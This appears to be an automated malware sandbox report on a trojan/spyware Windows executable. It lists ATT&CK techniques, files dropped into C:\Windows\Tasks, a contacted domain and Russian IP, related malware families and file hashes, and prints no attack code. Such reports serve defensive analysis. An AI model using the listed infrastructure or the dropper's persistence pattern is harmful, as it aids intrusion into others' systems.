Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	22 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Bootkit	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
7q551ugrWe.exe	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V	0%	ReversingLabs
C:\Windows\Tasks\Nfe70s.UFVVkM	0%	ReversingLabs
C:\Windows\Tasks\WPSela.LSZr7V	0%	ReversingLabs
C:\Windows\Tasks\conhost.exe	0%	ReversingLabs
C:\Windows\Tasks\sync_browser.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
tbdcic.info	194.190.152.201	true	false	high
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
x1.i.lencr.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.uvnc.com	7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.11.dr	false	high
https://www.adobe.co	ReaderMessages.9.dr	false	high
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high
http://www.uvnc.comopenhttp://forum.uvnc.comnet	7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high
http://java.sun.com/products/plugin/index.html#download	7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high
http://forum.uvnc.com	7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high
http://ocsp.thawte.com0	7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.190.152.201	tbdcic.info	Russian Federation		41615	RSHB-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579876
Start date and time:	2024-12-23 13:38:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7q551ugrWe.exe renamed because original name is a hash value
Original Sample Name:	c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@56/62@7/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 23.195.39.65, 199.232.210.172, 23.32.239.56, 2.19.198.27, 184.30.20.134, 23.32.239.65, 23.32.239.9, 2.19.198.16, 13.107.246.63, 23.218.208.109, 4.245.163.56
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, azureedge-t-prod.trafficmanager.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 7q551ugrWe.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
194.190.152.201	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	199.232.214.172
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	199.232.214.172
	q8b3OisMC4.dll	Get hash	malicious	Unknown	Browse	199.232.210.172
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	199.232.210.172
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	199.232.210.172
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	199.232.214.172
	eszstwQPwq.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	0vM02qWRT9.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
s-part-0035.t-0009.t-msedge.net	https://laimilano.powerappsportals.com/	Get hash	malicious	Unknown	Browse	13.107.246.63
	G3izWAY3Fa.exe	Get hash	malicious	GhostRat, Nitol	Browse	13.107.246.63
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	13.107.246.63
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	4je7za5c0V.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	13.107.246.63
	uuOuIXWp1W.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	dnf5RWZv2v.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	ME3htMIepa.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	stealcy11.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
tbdcic.info	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RSHB-ASRU	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	document.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
	mSRW5AfJpC.exe	Get hash	malicious	UltraVNC	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.257773714258335
Encrypted:	false
SSDEEP:	6:vYVq2PqLTwi2nKuAl9OmbnIFUt85ugZmw+5uIkwOqLTwi2nKuAl9OmbjLJ:vYVv8wZHAahFUt8wg/+wI5TwZHAaSJ
MD5:	DA43595C86B2D1E111E7BB6943EA7BCA
SHA1:	6668BAD69B8FE7135CF94C16BB72BD6B80EA1E8D
SHA-256:	3617FA737D60F6E27DB28C15C0D207A933D460E0BA8B4B26F84E62356BABACD0
SHA-512:	20BFA43FF6D9C69960949E1E6485BF597AE19B0757DC58349CCE214480868AF8418C18241652971B91977A244C66726DF4B448540D21CC34C7F49DDB297B7BEA
Malicious:	false
Preview:	2024/12/23-07:39:41.534 1f80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:39:41.548 1f80 Recovering log #3.2024/12/23-07:39:41.548 1f80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.257773714258335
Encrypted:	false
SSDEEP:	6:vYVq2PqLTwi2nKuAl9OmbnIFUt85ugZmw+5uIkwOqLTwi2nKuAl9OmbjLJ:vYVv8wZHAahFUt8wg/+wI5TwZHAaSJ
MD5:	DA43595C86B2D1E111E7BB6943EA7BCA
SHA1:	6668BAD69B8FE7135CF94C16BB72BD6B80EA1E8D
SHA-256:	3617FA737D60F6E27DB28C15C0D207A933D460E0BA8B4B26F84E62356BABACD0
SHA-512:	20BFA43FF6D9C69960949E1E6485BF597AE19B0757DC58349CCE214480868AF8418C18241652971B91977A244C66726DF4B448540D21CC34C7F49DDB297B7BEA
Malicious:	false
Preview:	2024/12/23-07:39:41.534 1f80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:39:41.548 1f80 Recovering log #3.2024/12/23-07:39:41.548 1f80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.152428140762309
Encrypted:	false
SSDEEP:	6:8q2PqLTwi2nKuAl9Ombzo2jMGIFUt8ravZZmw++87kwOqLTwi2nKuAl9Ombzo2jz:8v8wZHAa8uFUt8+h/++875TwZHAa8RJ
MD5:	31A9FE09CE1748F0275C0C858A478811
SHA1:	6DA15D3CFC5C06E4F98C22E25AD3B96D384E6945
SHA-256:	D0FB0E9B34FFBC058006B5F2602BA09E86F9935EABF25D24FF2E49AD40E19857
SHA-512:	BCEBBD5237CDDE4090AFE1DA36EFD1DE11C200A3F7FAEBD4A52029DD5E8C491A84B9292A76AC1F904F1DEE82895020D1C4FE93B9B9F98432D7A5D54E35A9BC1B
Malicious:	false
Preview:	2024/12/23-07:39:41.723 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:39:41.730 1c10 Recovering log #3.2024/12/23-07:39:41.731 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.152428140762309
Encrypted:	false
SSDEEP:	6:8q2PqLTwi2nKuAl9Ombzo2jMGIFUt8ravZZmw++87kwOqLTwi2nKuAl9Ombzo2jz:8v8wZHAa8uFUt8+h/++875TwZHAa8RJ
MD5:	31A9FE09CE1748F0275C0C858A478811
SHA1:	6DA15D3CFC5C06E4F98C22E25AD3B96D384E6945
SHA-256:	D0FB0E9B34FFBC058006B5F2602BA09E86F9935EABF25D24FF2E49AD40E19857
SHA-512:	BCEBBD5237CDDE4090AFE1DA36EFD1DE11C200A3F7FAEBD4A52029DD5E8C491A84B9292A76AC1F904F1DEE82895020D1C4FE93B9B9F98432D7A5D54E35A9BC1B
Malicious:	false
Preview:	2024/12/23-07:39:41.723 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:39:41.730 1c10 Recovering log #3.2024/12/23-07:39:41.731 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\146c4822-b7bb-4091-90ee-fca5ee58ec03.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.975316331738347
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqNWsBdOg2HrAcaq3QYiub5P7E4TX:Y2sRdsw7dMHH3QYhbt7n7
MD5:	BCC296E0282EA5C2641F549751BC4B0F
SHA1:	40C152840C1528E16010297964215E8C37E31F9D
SHA-256:	FBB5C80F64D6BF591FFA1998CE1C4F5B58664323C261A277AD98011F32194215
SHA-512:	9AC89DE014931812FCC02F8D3C9D38679C9FB1C002B5CEA38F6547215FB812B905E2380023A41175A0962D5F9057A59B41B68FE85AE3F8C85202A18249DB6FDC
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517590452995","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":620879},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3f9f2b.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\abfffe4c-54d7-4818-90e8-bf9790d6e8bd.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96165270016851
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
MD5:	ACCB522AE87A739BDC04EB5A34975EEB
SHA1:	A41FED54445E729A85E7017A002D4FF6FCAFEC93
SHA-256:	C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
SHA-512:	5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	3878
Entropy (8bit):	5.218560714007146
Encrypted:	false
SSDEEP:	96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz82Fh+YGf6:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz8I
MD5:	44FD678CA5A05B5D961AB608A6915579
SHA1:	E7E5A2061057A64C4E1E8942B1029B7BB2C033FB
SHA-256:	882A3245E05510F9A3DA80133244AF9BA764B6E7DC5B2A213FDFFD62F64AA3BB
SHA-512:	C766E506ECF67795672B1592577F54C46A87AC000E75C217E463267643FCB9F5194B68990672F91EB457CB4454B3A0E3CA00C2C5CD5F296563136CF9FE912087
Malicious:	false
Preview:	*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.177696223027514
Encrypted:	false
SSDEEP:	6:pAq2PqLTwi2nKuAl9OmbzNMxIFUt8hhZmw+NikwOqLTwi2nKuAl9OmbzNMFLJ:pAv8wZHAa8jFUt8hh/+45TwZHAa84J
MD5:	B569FC7268A43DC601E2D3BCD71AC72B
SHA1:	C7D8AF0020C15B408E6AE244D2FAB30DF4FD6C2B
SHA-256:	A70AA4E41BB67C779A44528E5B3B883CCE7BA2881969D7CBC64ADDFB9830D982
SHA-512:	83EC67C7530CE736814345E4A20052A811134604759EE4208062A196038FE57668ED4B2BE2D07E3803D4CC35C8565D26CED8C5C771614AEAB9090612C620A7E6
Malicious:	false
Preview:	2024/12/23-07:39:41.938 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:39:41.939 1c10 Recovering log #3.2024/12/23-07:39:41.941 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.177696223027514
Encrypted:	false
SSDEEP:	6:pAq2PqLTwi2nKuAl9OmbzNMxIFUt8hhZmw+NikwOqLTwi2nKuAl9OmbzNMFLJ:pAv8wZHAa8jFUt8hh/+45TwZHAa84J
MD5:	B569FC7268A43DC601E2D3BCD71AC72B
SHA1:	C7D8AF0020C15B408E6AE244D2FAB30DF4FD6C2B
